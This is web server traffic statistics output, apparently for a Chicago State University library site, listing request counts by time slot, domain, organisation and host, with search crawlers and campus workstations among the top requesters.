10:50–10:551311212548++++++++++++++++++++++++++++++++
10:55–11:001287412398+++++++++++++++++++++++++++++++
    
11:00–11:051234411848++++++++++++++++++++++++++++++
11:05–11:101260812038+++++++++++++++++++++++++++++++
11:10–11:151296412356+++++++++++++++++++++++++++++++
11:15–11:201276312270+++++++++++++++++++++++++++++++
11:20–11:251268112134+++++++++++++++++++++++++++++++
11:25–11:301324612582++++++++++++++++++++++++++++++++
11:30–11:351376813183+++++++++++++++++++++++++++++++++
11:35–11:401403613429++++++++++++++++++++++++++++++++++
11:40–11:451515314555+++++++++++++++++++++++++++++++++++++
11:45–11:501283012436++++++++++++++++++++++++++++++++
11:50–11:551314512498++++++++++++++++++++++++++++++++
11:55–12:001376313006+++++++++++++++++++++++++++++++++
    
12:00–12:051269612212+++++++++++++++++++++++++++++++
12:05–12:101253412081+++++++++++++++++++++++++++++++
12:10–12:151329812806+++++++++++++++++++++++++++++++++
12:15–12:201290912410++++++++++++++++++++++++++++++++
12:20–12:251293012368+++++++++++++++++++++++++++++++
12:25–12:301321412528++++++++++++++++++++++++++++++++
12:30–12:351328012786++++++++++++++++++++++++++++++++
12:35–12:401313012662++++++++++++++++++++++++++++++++
12:40–12:451332812811+++++++++++++++++++++++++++++++++
12:45–12:501300212541++++++++++++++++++++++++++++++++
12:50–12:551376413233++++++++++++++++++++++++++++++++++
12:55–13:001311912453++++++++++++++++++++++++++++++++
    
13:00–13:051335512817+++++++++++++++++++++++++++++++++
13:05–13:101360213115+++++++++++++++++++++++++++++++++
13:10–13:151317312388+++++++++++++++++++++++++++++++
13:15–13:201303212599++++++++++++++++++++++++++++++++
13:20–13:251308912558++++++++++++++++++++++++++++++++
13:25–13:301298212487++++++++++++++++++++++++++++++++
13:30–13:351301612467++++++++++++++++++++++++++++++++
13:35–13:401271112256+++++++++++++++++++++++++++++++
13:40–13:451272112182+++++++++++++++++++++++++++++++
13:45–13:501258012084+++++++++++++++++++++++++++++++
13:50–13:551264612249+++++++++++++++++++++++++++++++
13:55–14:001274412296+++++++++++++++++++++++++++++++
    
14:00–14:051295012427++++++++++++++++++++++++++++++++
14:05–14:101381513280++++++++++++++++++++++++++++++++++
14:10–14:151436213840+++++++++++++++++++++++++++++++++++
14:15–14:201410613541++++++++++++++++++++++++++++++++++
14:20–14:251358713206++++++++++++++++++++++++++++++++++
14:25–14:301252112103+++++++++++++++++++++++++++++++
14:30–14:351302312577++++++++++++++++++++++++++++++++
14:35–14:401299912459++++++++++++++++++++++++++++++++
14:40–14:451303412546++++++++++++++++++++++++++++++++
14:45–14:501287312382+++++++++++++++++++++++++++++++
14:50–14:551318212726++++++++++++++++++++++++++++++++
14:55–15:001282512371+++++++++++++++++++++++++++++++
    
15:00–15:051257811974++++++++++++++++++++++++++++++
15:05–15:101369712940+++++++++++++++++++++++++++++++++
15:10–15:151383113288++++++++++++++++++++++++++++++++++
15:15–15:201350712934+++++++++++++++++++++++++++++++++
15:20–15:251287612347+++++++++++++++++++++++++++++++
15:25–15:301337612771++++++++++++++++++++++++++++++++
15:30–15:351393613336++++++++++++++++++++++++++++++++++
15:35–15:401389113331++++++++++++++++++++++++++++++++++
15:40–15:451306912456++++++++++++++++++++++++++++++++
15:45–15:501334412725++++++++++++++++++++++++++++++++
15:50–15:551338312780++++++++++++++++++++++++++++++++
15:55–16:001258712083+++++++++++++++++++++++++++++++
    
16:00–16:051230511796++++++++++++++++++++++++++++++
16:05–16:101226811808++++++++++++++++++++++++++++++
16:10–16:151243811798++++++++++++++++++++++++++++++
16:15–16:201230911757++++++++++++++++++++++++++++++
16:20–16:251196011410+++++++++++++++++++++++++++++
16:25–16:301210311605++++++++++++++++++++++++++++++
16:30–16:351248211888++++++++++++++++++++++++++++++
16:35–16:401152911057++++++++++++++++++++++++++++
16:40–16:451195611496+++++++++++++++++++++++++++++
16:45–16:501196011445+++++++++++++++++++++++++++++
16:50–16:551227511844++++++++++++++++++++++++++++++
16:55–17:001138510948++++++++++++++++++++++++++++
    
17:00–17:051116310727+++++++++++++++++++++++++++
17:05–17:101058910200++++++++++++++++++++++++++
17:10–17:15101719829+++++++++++++++++++++++++
17:15–17:201057810156++++++++++++++++++++++++++
17:20–17:251084410458+++++++++++++++++++++++++++
17:25–17:30103349982+++++++++++++++++++++++++
17:30–17:3598249437++++++++++++++++++++++++
17:35–17:4099249481++++++++++++++++++++++++
17:40–17:4597549404++++++++++++++++++++++++
17:45–17:5095559181+++++++++++++++++++++++
17:50–17:5594299091+++++++++++++++++++++++
17:55–18:0096149131+++++++++++++++++++++++
    
18:00–18:0592818872+++++++++++++++++++++++
18:05–18:1092568956+++++++++++++++++++++++
18:10–18:1594338969+++++++++++++++++++++++
18:15–18:2094689130+++++++++++++++++++++++
18:20–18:2594219046+++++++++++++++++++++++
18:25–18:3091598870+++++++++++++++++++++++
18:30–18:3592338655++++++++++++++++++++++
18:35–18:4096189286++++++++++++++++++++++++
18:40–18:4590328666++++++++++++++++++++++
18:45–18:5093608998+++++++++++++++++++++++
18:50–18:5599479594++++++++++++++++++++++++
18:55–19:001093310498+++++++++++++++++++++++++++
    
19:00–19:0589518583++++++++++++++++++++++
19:05–19:1081557705++++++++++++++++++++
19:10–19:1589818663++++++++++++++++++++++
19:15–19:2091038688++++++++++++++++++++++
19:20–19:2588248451++++++++++++++++++++++
19:25–19:3087138405++++++++++++++++++++++
19:30–19:35102299850+++++++++++++++++++++++++
19:35–19:4090158595++++++++++++++++++++++
19:40–19:4585648197+++++++++++++++++++++
19:45–19:5088548442++++++++++++++++++++++
19:50–19:5594459062+++++++++++++++++++++++
19:55–20:0094379049+++++++++++++++++++++++
    
20:00–20:0585998162+++++++++++++++++++++
20:05–20:1095979133+++++++++++++++++++++++
20:10–20:1583437992++++++++++++++++++++
20:15–20:2079607573+++++++++++++++++++
20:20–20:2583518042+++++++++++++++++++++
20:25–20:3091398711++++++++++++++++++++++
20:30–20:3582527828++++++++++++++++++++
20:35–20:4077527385+++++++++++++++++++
20:40–20:4581047650++++++++++++++++++++
20:45–20:5073036918++++++++++++++++++
20:50–20:5576927306+++++++++++++++++++
20:55–21:0077027248+++++++++++++++++++
    
21:00–21:0581487811++++++++++++++++++++
21:05–21:1081437844++++++++++++++++++++
21:10–21:1583947998++++++++++++++++++++
21:15–21:2083667974++++++++++++++++++++
21:20–21:2582747893++++++++++++++++++++
21:25–21:3075877149++++++++++++++++++
21:30–21:3579977598+++++++++++++++++++
21:35–21:4077687389+++++++++++++++++++
21:40–21:4571466839++++++++++++++++++
21:45–21:5076117274+++++++++++++++++++
21:50–21:5571146764+++++++++++++++++
21:55–22:0066936376++++++++++++++++
    
22:00–22:0565906273++++++++++++++++
22:05–22:1065146161++++++++++++++++
22:10–22:1565706204++++++++++++++++
22:15–22:2065626243++++++++++++++++
22:20–22:2566826358++++++++++++++++
22:25–22:3074007067++++++++++++++++++
22:30–22:3565746305++++++++++++++++
22:35–22:4071546858++++++++++++++++++
22:40–22:4561465844+++++++++++++++
22:45–22:5059725700+++++++++++++++
22:50–22:5555695260++++++++++++++
22:55–23:0055705260++++++++++++++
    
23:00–23:0561945804+++++++++++++++
23:05–23:1055995249++++++++++++++
23:10–23:1561325688+++++++++++++++
23:15–23:2059355604+++++++++++++++
23:20–23:2557065432++++++++++++++
23:25–23:3053625101+++++++++++++
23:30–23:3554025097+++++++++++++
23:35–23:4049004636++++++++++++
23:40–23:4549304571++++++++++++
23:45–23:5050514743++++++++++++
23:50–23:5547594486++++++++++++
23:55–24:0048564637++++++++++++

Domain Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the countries of the computers which requested files.

Listing domains with at least 250 requests, sorted by the number of requests.

reqs%bytesdomain
80038831.51%.edu (USA Higher Education)
76660229.52%  csu.edu (Chicago State University)
852 0.03%    libnext.csu.edu (Chicago State University Academic Library)
64383925.65%.net (Networks)
51269727.02%.com (Commercial)
211978 9.85%[unresolved numerical addresses]
31353 1.12%.org (Non Profit Making Organisations)
17798 0.47%.ru (Russia)
14411 0.73%.us (United States)
9711 0.35%.es (Spain)
9393 0.30%.ro (Romania)
8476 0.16%.de (Germany)
7556 0.28%.jp (Japan)
7376 0.27%[unknown domain]
4909 0.25%.cn (China)
4276 0.16%.cz (Czech Republic)
3288 0.15%.uk (United Kingdom)
3121 0.10%.ca (Canada)
2843 0.06%.ua (Ukraine)
2637 0.12%.gov (USA Government)
2170 0.04%.fr (France)
1970 0.08%[domain not given]
1955 0.10%.id (Indonesia)
1898 0.08%.au (Australia)
1709 0.05%.arpa (Arpanet)
1639 0.08%.in (India)
1294 0.06%.br (Brazil)
1049 0.05%.nl (Netherlands)
961 0.05%.it (Italy)
932 0.02%.se (Sweden)
903 0.05%.be (Belgium)
884 0.04%.my (Malaysia)
883 0.04%.sa (Saudi Arabia)
816 0.03%.tr (Turkey)
796 0.05%.gt (Guatemala)
672 0.03%.pl (Poland)
601 0.03%.lv (Latvia)
551 0.03%.info (Informational)
537 0.03%.mx (Mexico)
468 0.02%.mil (USA Military)
464 0.02%.il (Israel)
431 0.03%.ye (Yemen)
387 0.02%.tw (Taiwan)
383 0.03%.lu (Luxembourg)
381 0.02%.pk (Pakistan)
370 0.02%.th (Thailand)
363 0.01%.gr (Greece)
358 0.01%.ch (Switzerland)
340 0.01%.ar (Argentina)
303 0.01%.sg (Singapore)
290 0.01%.fi (Finland)
286 0.02%.dk (Denmark)
275 0.01%.no (Norway)
266 0.01%.bg (Bulgaria)
259 0.01%.ph (Philippines)
4327 0.26%[not listed: 115 domains]

Organisation Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the organisations of the computers which requested files.

Listing organisations with at least 250 requests, sorted by the number of requests.

reqs%bytesorganisation
76660229.52%csu.edu
183307 7.72%comcast.net
153076 4.94%sbcglobal.net
133934 6.63%googlebot.com
94331 6.69%msn.com
86712 3.90%ameritech.net
67849 2.18%yahoo.net
46389 4.00%yahoo.com
30387 1.04%wideopenwest.com
22238 0.68%inktomisearch.com
17616 0.77%aol.com
16888 0.43%baidu.com
16805 0.41%yandex.ru
14767 0.67%clearwire-wmx.net
10585 0.44%64.150
10550 0.24%119
10510 0.41%rr.com
9422 0.33%paginasamarillas.es
9009 0.47%cps.k12.il.us
8355 0.24%live.com
8172 0.33%70
7725 0.28%theplanet.com
7718 0.15%leapwireless.net
7648 0.53%qwest.net
7393 0.27%[unknown domain]
7298 0.29%cox.net
6956 0.19%38
6901 0.20%rcn.com
6491 0.27%verizon.net
6364 0.09%dotnetdotcom.org
6359 0.21%charter.com
6205 0.24%12
6047 0.15%fastsearch.net
6007 0.16%spcsdns.net
5666 0.17%rdsnet.ro
5566 0.05%your-server.de
5109 0.01%google.com
5048 0.17%comcastbusiness.net
4797 0.18%amazonaws.com
4600 0.14%ask.com
4499 0.11%xo.net
4365 0.16%65.214
4192 0.19%level3.net
4129 0.15%uic.edu
3966 0.16%ccc.edu
3914 0.14%cesnet.cz
3910 0.15%63.81
3854 0.14%82
3850 0.09%ev1servers.net
3795 0.27%202.108
3720 0.08%tmodns.net
3702 0.08%cuil.com
3658 0.12%mindspring.com
3567 0.16%178.239
3375 0.14%124
3319 0.14%illinois.net
3307 0.05%67.151
3272 0.12%pacbell.net
3227 0.10%miya.or.jp
3212 0.10%69
3137 0.09%myvzw.com
3084 0.08%10
3046 0.10%swbell.net
3031 0.25%65.55
3010 0.13%covad.net
3002 0.08%220.181
2820 0.12%64.107
2685 0.38%72
2675 0.13%66.99
2659 0.14%speedsite.com
2620 0.20%thecentraldatabank.com
2605 0.08%future-host.org
2603 0.08%altushost.com
2593 0.10%chipublib.org
2588 0.16%super-goo.com
2564 0.05%lunarpages.com
2504 0.06%abac.net
2482 0.15%softlayer.com
2443 0.06%tamu.edu
2421 0.07%bta.net.cn
2407 0.07%mycingular.net
2257 0.06%become.com
2230 0.07%live-servers.net
2223 0.39%concentric.net
2192 0.08%141.52
2150 0.35%208.68
2142 0.03%scoutjet.com
2100 0.10%picsearch.com
2086 0.08%dslextreme.com
2053 0.08%198.173
2021 0.04%210.108
2003 0.10%twtelecom.net
1982 0.10%archive.org
1979 0.07%optonline.net
1975 0.11%220.169
1970 0.08%[domain not given]
1924 0.14%2dayhost.com
1878 0.10%66.158
1875 0.05%linksmanager.com
1870 0.06%64.208
1870 0.06%tpiol.com
1870 0.09%mcleodusa.net
1868 0.13%208.111
1862 0.05%114
1859 0.08%goo.ne.jp
1844 0.02%utel.net.ua
1840 0.09%bellsouth.net
1824 0.33%embarqhsd.net
1805 0.09%58
1801 0.08%uchicago.edu
1786 0.09%66.231
1758 0.14%163data.com.cn
1749 0.09%att.net
1709 0.05%arpa
1664 0.05%privatedns.com
1660 0.25%163.191
1622 0.05%77
1602 0.06%74
1548 0.07%calpop.com
1544 0.01%w3.org
1544 0.01%dedibox.fr
1539 0.03%entireweb.com
1500 0.03%99
1496 0.05%65.54
1496 0.03%govst.edu
1479 0.08%fast.net.id
1462 0.07%untd.com
1446 0.08%ssfhs.org
1436 0.07%121
1380 0.11%serverloft.com
1314 0.08%62.38
1278 0.06%s-cook.k12.il.us
1260 0.04%next-gen.ro
1226 0.06%as13448.com
1196 0.05%nmh.org
1128 0.03%onlinehome-server.com
1109 0.09%61.247
1108 0.04%attens.net
1068 0.03%shawcable.net
1059 0.04%uiuc.edu
1045 0.02%kcl.net
1036 0.04%5299.org
1021 0.02%exabot.com
1021 0.04%insightbb.com
1020 0.04%165.68
1017 0.02%looksmart.com
1015 0.04%89
998 0.04%pccwglobal.net
989 0.31%primarydns.com
988 0.02%208.66
985 0.06%60
977 0.04%virginmedia.com
948 0.03%worio.com
934 0.03%cableone.net
933 0.03%65.19
928 springshare.com
924 0.06%91
910 0.06%wowrack.com
902 0.03%kimsufi.com
900 0.05%blackberry.net
882 0.03%207.63
873 0.03%202.179
867 0.04%cimcoisp.net
853 0.02%digitalrealm.net
827 0.04%isu.net.sa
815 0.02%188.143
809 0.04%neiu.edu
797 0.03%algx.net
793 0.05%intelnet.net.gt
791 0.04%majestic12.co.uk
790 0.03%speakeasy.net
785 0.56%facelocatecave.com
772 0.06%hinet.net
755 0.04%63.241
750 0.10%ubiquityservers.com
741 0.03%uhlich.org
736 0.02%220.226
735 0.02%mc.videotron.ca
728 0.04%nagaokaut.ac.jp
728 0.04%64.241
718 0.04%113
707 0.02%195.225
706 0.03%173.242
703 0.04%123
700 0.02%verisign.net
699 0.03%advocatehealth.com
695 0.04%enh.org
686 0.02%servepath.com
684 0.04%vsnl.net.in
681 0.03%216.125
679 0.04%212.95
678 0.03%131.107
674 0.04%125
674 0.03%comnetusa.com
673 0.01%tdc.se
670 0.01%64.134
668 0.04%190.42
668 0.01%dc.ukrtelecom.ua
658 0.04%northwestern.edu
652 0.02%dsl.bell.ca
645 0.04%steadfast.net
645 0.04%59
639 0.02%tpgi.com.au
629 0.02%mchsi.com
625 0.13%210.150
624 0.02%83
613 0.28%iplannetworks.net
605 0.02%sitebuildit.com
602 0.02%66.249
597 0.02%astral.ro
595 0.03%uu.net
595 0.03%216.158
593 0.02%219.142
586 0.02%123systems.net
578 0.06%109
576 0.04%64.120
574 0.03%access.telenet.be
570 0.02%68.79
569 0.02%gigablast.com
566 0.04%knology.net
563 0.01%cs.uwaterloo.ca
561 0.02%morainevalley.net
539 0.03%earthlink.net
536 0.02%pldt.net
536 0.02%healthline.com
536 0.02%202.96
534 0.01%157.55
533 0.03%ovh.net
533 0.04%district133.org
529 0.02%208.77
526 0.02%65.79
526 0.03%79
523 0.03%rima-tde.net
519 0.02%dundee.ac.uk
512 0.03%rogers.com
507 0.02%leadershipdirectories.com
497 0.01%27
497 0.03%95
497 0.01%ucla.edu
494 0.02%216.124
491 0.02%keymachine.de
488 0.02%85
487 0.03%cronosit.lv
487 0.02%best-server.net
485 0.02%arrangeequateeverybody.com
485 0.04%sistrix.net
475 0.02%cloud-ips.com
464 0.02%78
462 0.01%depaul.edu
460 0.03%204.249
457 0.02%va.gov
455 0.02%cityreview.org
453 0.01%uni-leipzig.de
452 0.01%canals.ro
450 illins.com
447 0.01%bilkent.edu.tr
447 0.02%iit.edu
445 0.02%117
443 0.01%66.96
443 0.03%111
443 0.01%cosmixcorp.com
441 0.03%t-dialin.net
440 0.01%mymmode.com
435 0.02%152.163
433 0.01%194.97
433 0.05%kavam.net
431 0.03%ye
431 0.31%cazoodle.com
429 0.02%networkgci.net
429 0.02%sfr.net
422 0.02%uitm.edu.my
421 0.01%174.136
419 0.02%broadviewnet.net
419 0.02%198.64
418 0.02%wanadoo.fr
418 0.01%enmaxenvision.net
410 0.03%64.109
405 0.02%64.233
400 0.01%165.20
396 0.02%adelphia.net
395 0.02%41
393 0.02%telecomitalia.it
393 0.02%yahooresearchcluster.com
392 0.01%75
391 0.04%colt.net
385 0.02%focaldata.net
382 0.02%ecatel.net
382 crawl.baidu.jp
381 0.02%btcentralplus.com
379 0.02%122.airtelbroadband.in
376 0.01%bwms.com.br
375 0.02%server.lu
374 0.01%will.k12.il.us
374 0.01%onshore.net
367 0.01%sdsl.bell.ca
356 0.01%68.249
356 0.01%illinois.edu
356 0.02%174.46
354 0.02%209.175
354 0.03%210.173
354 0.01%accelovation.com
351 0.01%uchospitals.edu
350 0.28%poly.edu
346 0.02%chello.nl
344 0.03%netvigator.com
343 0.02%hostnoc.net
342 0.03%wiu.edu
341 0.01%turnitin.com
339 0.01%202.176
337 0.01%kpn.net
335 0.03%leaseweb.com
331 0.01%67.139
331 0.02%dupage.k12.il.us
320 0.02%asd.tj.cn
320 0.01%army.mil
317 0.02%tm.net.my
317 0.06%165.193
316 0.01%eiu.edu
316 0.02%ono.com
316 0.01%as9105.com
315 0.01%lydiahome.org
313 0.02%116
313 0.01%asianet.co.th
309 0.04%tedata.net
309 0.01%uscourts.gov
307 0.02%uni-hannover.de
305 0.01%rpslmc.edu
300 0.07%193.169
299 0.02%rush.edu
297 0.01%standardshell.net
296 0.01%cogentco.com
295 0.01%grouptelecom.net
292 0.01%32
292 0.01%popsite.net
290 0.01%optusnet.com.au
289 0.01%ilstu.edu
288 0.01%megapath.net
286 0.01%161.225
285 0.02%usps.gov
285 0.01%w-cook.k12.il.us
283 0.01%sinai.org
283 0.01%siu.edu
283 0.01%csun.edu
281 0.01%71
281 0.01%transcore.com
279 0.01%cubbsnet.com
279 0.01%211.100
278 0.01%212.138
275 0.01%161.57
274 0.01%snet.net
270 0.01%cbfamilies.org
269 0.02%frontiernet.net
269 0.01%niu.edu
268 0.01%u-tokyo.ac.jp
267 0.01%62.139
265 0.01%starcomms.com
264 0.01%222.239
262 0.02%76
261 0.03%199.15
260 0.01%188.92
259 0.01%raysil.co.uk
257 0.01%chase.com
257 0.01%bloomdistrict206.org
255 0.01%proservis.net
254 0.02%prod-infinitum.com.mx
253 0.01%209.237
252 0.01%144.74
252 0.01%ssa.gov
250 0.01%ttnet.net.tr
141338 7.06%[not listed: 11,845 organisations]

Host Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the computers which requested files.

Listing hosts with at least 1000 requests, sorted by the number of requests.

reqs%byteshost
19299 0.58%msnbot.msn.com
18486 1.26%workstation-10-141-1-16.csu.edu
16933 0.50%b3091219.crawl.yahoo.net
15558 0.87%host-10-141-1-16.csu.edu
11300 0.19%host-10-141-1-30.csu.edu
10096 0.27%spider16.yandex.ru
9556 0.19%b3091150.crawl.yahoo.net
9422 0.33%paginasamarillas.es
8722 3.38%crawl-66-249-70-239.googlebot.com
7000 0.14%host-10-141-1-197.csu.edu
6799 0.24%workstation-172-16-33-35.csu.edu
6774 0.19%c-67-184-125-51.hsd1.il.comcast.net
6364 0.09%crawl7.dotnetdotcom.org
5828 0.14%crawl-66-249-71-200.googlebot.com
5020 0.11%b3091006.crawl.yahoo.net
4927 0.08%workstation-172.16.33.88.csu.edu
4674 0.15%92.b9.5646.static.theplanet.com
4616 0.12%b3090900.crawl.yahoo.net
4493 0.08%host-10-141-1-125.csu.edu
4481 0.06%host-10-141-2-56.csu.edu
4201 0.24%64.150.0.1
4065 0.55%c-68-32-126-140.hsd1.va.comcast.net
4045 0.16%70.42.51.20
3982 0.20%external47-162.cps.k12.il.us
3966 0.16%guardian2.ccc.edu
3951 0.08%host-10-141-1-185.csu.edu
3928 0.23%crawl-66-249-71-154.googlebot.com
3909 0.15%63.81.0.20
3858 0.21%workstation-10.141.1.129.csu.edu
3842 0.07%host-10-141-1-208.csu.edu
3761 0.05%host-10-141-1-111.csu.edu
3730 0.06%crawl-66-249-72-8.googlebot.com
3657 0.05%crawl-66-249-72-10.googlebot.com
3644 0.08%dhs-outbound.bos3.fastsearch.net
3600 0.12%jyxo-crawler3.streaming.cesnet.cz
3568 0.06%workstation-172-16-33-64.csu.edu
3542 0.07%workstation-172-16-33-76.csu.edu
3538 0.17%crawl-66-249-73-108.googlebot.com
3490 0.12%workstation-172-16-33-55.csu.edu
3489 0.15%llf320049.crawl.yahoo.net
3462 0.09%71-92-66-45.static.mtpk.ca.charter.com
3398 0.10%119.63.193.55
3367 0.13%70.42.51.10
3351 0.37%63-149-229-67.dia.static.qwest.net
3292 0.23%202.108.11.106
3278 0.09%b3091290.crawl.yahoo.net
3275 0.05%67.151.219.61
3268 0.07%host-10-141-1-191.csu.edu
3227 0.10%radius.miya.or.jp
3167 0.05%host-10-141-1-68.csu.edu
3108 0.04%spider82.yandex.ru
3032 0.13%workstation-10.141.2.37.csu.edu
3029 0.07%host-10-141-1-138.csu.edu
3019 0.05%workstation-172-16-33-103.csu.edu
3010 0.05%workstation-172-16-33-49.csu.edu
2994 0.14%llf520042.crawl.yahoo.net
2993 0.05%67.110.143.50.ptr.us.xo.net
2856 0.09%workstation-172-16-17-38.csu.edu
2852 0.09%65.214.45.133
2845 0.18%workstation-10.141.2.99.csu.edu
2778 0.05%workstation-172-16-33-61.csu.edu
2729 0.04%crawl-66-249-71-142.googlebot.com
2716 0.05%workstation-172-16-33-43.csu.edu
2703 0.11%msnbot-65-55-213-5.search.msn.com
2675 0.07%crawl-66-249-71-2.googlebot.com
2639 0.11%c-68-60-227-39.hsd1.il.comcast.net
2625 esplanade.yst.corp.yahoo.com
2620 0.20%mail.thecentraldatabank.com
2603 0.08%windows.future-host.org
2579 0.09%rrcs-71-41-71-114.se.biz.rr.com
2561 0.05%ds00220.lunarpages.com
2557 0.05%workstation-172-16-33-44.csu.edu
2535 0.12%178.239.58.138
2524 0.04%crawl-66-249-72-180.googlebot.com
2511 0.05%host-10-141-2-53.csu.edu
2489 0.05%workstation-172-16-33-39.csu.edu
2475 0.15%workstation-10.141.1.145.csu.edu
2464 0.07%unknown-74-6-25-x.yahoo.com
2458 0.05%crawl-66-249-71-171.googlebot.com
2450 0.10%unknown-67-195-51-x.yahoo.com
2431 0.08%97-124-202-7.hlrn.qwest.net
2428 0.08%ip72-196-230-164.dc.dc.cox.net
2380 0.12%workstation-10-141-1-15.csu.edu
2366 0.14%unknown-74-6-23-x.yahoo.com
2363 0.04%crawl-66-249-72-204.googlebot.com
2327 0.04%host-10-141-1-240.csu.edu
2322 0.04%host-10-141-1-163.csu.edu
2311 0.03%crawl-66-249-72-84.googlebot.com
2297 0.12%msnbot-65-55-209-168.search.msn.com
2282 0.09%host-10-141-2-84.csu.edu
2281 0.09%unknown-74-6-24-x.yahoo.com
2258 0.06%hosted-by.altushost.com
2248 0.03%workstation-172-16-33-37.csu.edu
2243 0.05%206-225-85-167.dedicated.abac.net
2240 0.11%unknown-67-195-52-x.yahoo.com
2239 0.03%workstation-172-16-33-24.csu.edu
2212 0.13%msnbot-65-55-209-159.search.msn.com
2205 0.04%host-10-141-2-26.csu.edu
2200 0.09%workstation-10-141-1-59.csu.edu
2162 0.05%workstation-172-16-33-40.csu.edu
2147 0.05%vhost09.ev1servers.net
2126 0.06%host-10-141-1-33.csu.edu
2121 0.04%workstation-172-16-33-22.csu.edu
2110 0.06%crawler-gw-01.bos3.fastsearch.net
2065 0.04%host-10-141-1-59.csu.edu
2061 0.03%host-10-141-1-239.csu.edu
2059 0.04%workstation-172.16.33.83.csu.edu
2057 0.05%host-10-141-2-150.csu.edu
2053 0.04%host-10-141-1-209.csu.edu
2042 0.05%host-10-141-1-114.csu.edu
2035 0.07%msnbot-65-55-213-3.search.msn.com
2034 0.09%workstation-10-141-1-61.csu.edu
2021 0.04%210.108.47.5
2014 0.07%198.173.15.250
2006 0.03%workstation-172-16-33-48.csu.edu
2006 0.01%static.18.40.4.46.clients.your-server.de
2006 0.10%crawl-66-249-67-136.googlebot.com
1984 0.04%host-10-141-2-69.csu.edu
1973 0.04%workstation-172.16.33.86.csu.edu
1970 0.04%crawl-66-249-72-98.googlebot.com
1964 0.11%220.169.19.117
1963 0.03%workstation-172.16.33.87.csu.edu
1963 0.10%ia360938.us.archive.org
1961 0.07%msnbot-65-55-209-164.search.msn.com
1957 0.08%netblock-66-159-215-105.dslextreme.com
1933 0.04%workstation-172-16-33-45.csu.edu
1904 0.02%host-10-141-1-76.csu.edu
1892 0.05%egspd42204.ask.com
1881 0.06%125.71.79.82.static.cluj.rdsnet.ro
1874 0.07%unknown-74-6-20-x.yahoo.com
1870 0.06%tpiol.tpiol.com
1861 0.04%workstation-172.16.34.92.csu.edu
1855 0.05%host-10-141-1-58.csu.edu
1855 0.08%crs057.goo.ne.jp
1854 1.38%msnbot-65-55-209-167.search.msn.com
1844 0.05%unknown-74-6-26-x.yahoo.com
1830 0.09%12.108.127.159
1821 0.09%workstation-10-141-1-12.csu.edu
1814 0.06%host-10-141-1-2.csu.edu
1808 0.03%crawl-66-249-72-238.googlebot.com
1804 0.03%host-10-141-1-79.csu.edu
1803 0.05%38.101.148.126
1802 0.03%crawl-66-249-72-231.googlebot.com
1794 0.06%msnbot-65-55-209-158.search.msn.com
1793 0.03%host-10-141-2-6.csu.edu
1785 0.04%host-10-141-1-190.csu.edu
1782 0.09%66.231.189.102
1780 0.03%host-10-141-2-10.csu.edu
1768 0.08%msnbot-65-55-213-4.search.msn.com
1756 0.03%workstation-172-16-33-32.csu.edu
1755 0.07%82.208.161.209
1750 0.05%64.208.172.177
1749 0.06%msnbot-65-55-209-166.search.msn.com
1742 0.03%host-10-141-1-85.csu.edu
1737 0.88%msnbot-65-55-209-165.search.msn.com
1733 0.06%
1731 0.03%user-37ka4a0.dsl.mindspring.com
1730 0.05%adsl-69-108-142-17.dsl.irvnca.pacbell.net
1727 0.07%host-10-141-1-48.csu.edu
1707 0.04%host-10-141-2-146.csu.edu
1704 0.03%host-10-141-1-106.csu.edu
1703 0.05%workstation-10-141-1-5.csu.edu
1698 0.03%host-10-141-2-90.csu.edu
1696 0.03%c-68-60-226-125.hsd1.il.comcast.net
1684 0.04%host-10-141-1-133.csu.edu
1683 0.07%wsip-24-234-62-251.lv.lv.cox.net
1682 0.04%host-172-16-1-100.csu.edu
1676 1.39%unknown-74-6-28-x.yahoo.com
1667 0.10%workstation-10.141.1.90.csu.edu
1653 0.05%86-126-132-170.rdsnet.ro
1652 0.03%host-10-141-1-207.csu.edu
1644 0.10%workstation-10.141.1.114.csu.edu
1630 0.05%ip-72-55-156-12.static.privatedns.com
1619 0.04%ev1s-207-44-130-96.ev1servers.net
1616 0.07%crawl-66-249-72-133.googlebot.com
1615 0.06%host-10-141-1-117.csu.edu
1613 0.03%host-10-141-1-45.csu.edu
1612 0.03%workstation-172-16-33-66.csu.edu
1599 0.02%crawl-66-249-72-226.googlebot.com
1591 0.03%crawl-66-249-72-173.googlebot.com
1590 0.06%workstation-10-141-1-129.csu.edu
1579 0.04%host-10-141-1-20.csu.edu
1567 0.09%64.150.0.3
1562 0.04%host-10-141-1-131.csu.edu
1554 0.07%host-10-141-1-46.csu.edu
1548 0.07%unassigned.calpop.com
1539 0.02%host-10-141-2-48.csu.edu
1536 0.04%crawl-66-249-67-40.googlebot.com
1536 0.02%host-10-141-1-14.csu.edu
1535 0.07%workstation-10-141-1-60.csu.edu
1531 0.03%crawl-12c.cuil.com
1523 0.03%workstation-172-16-33-47.csu.edu
1517 0.31%nc-69-69-52-73.sta.embarqhsd.net
1514 0.04%host-10-141-1-54.csu.edu
1490 0.02%msnbot-65-55-3-141.search.msn.com
1475 0.09%65.55.232.26
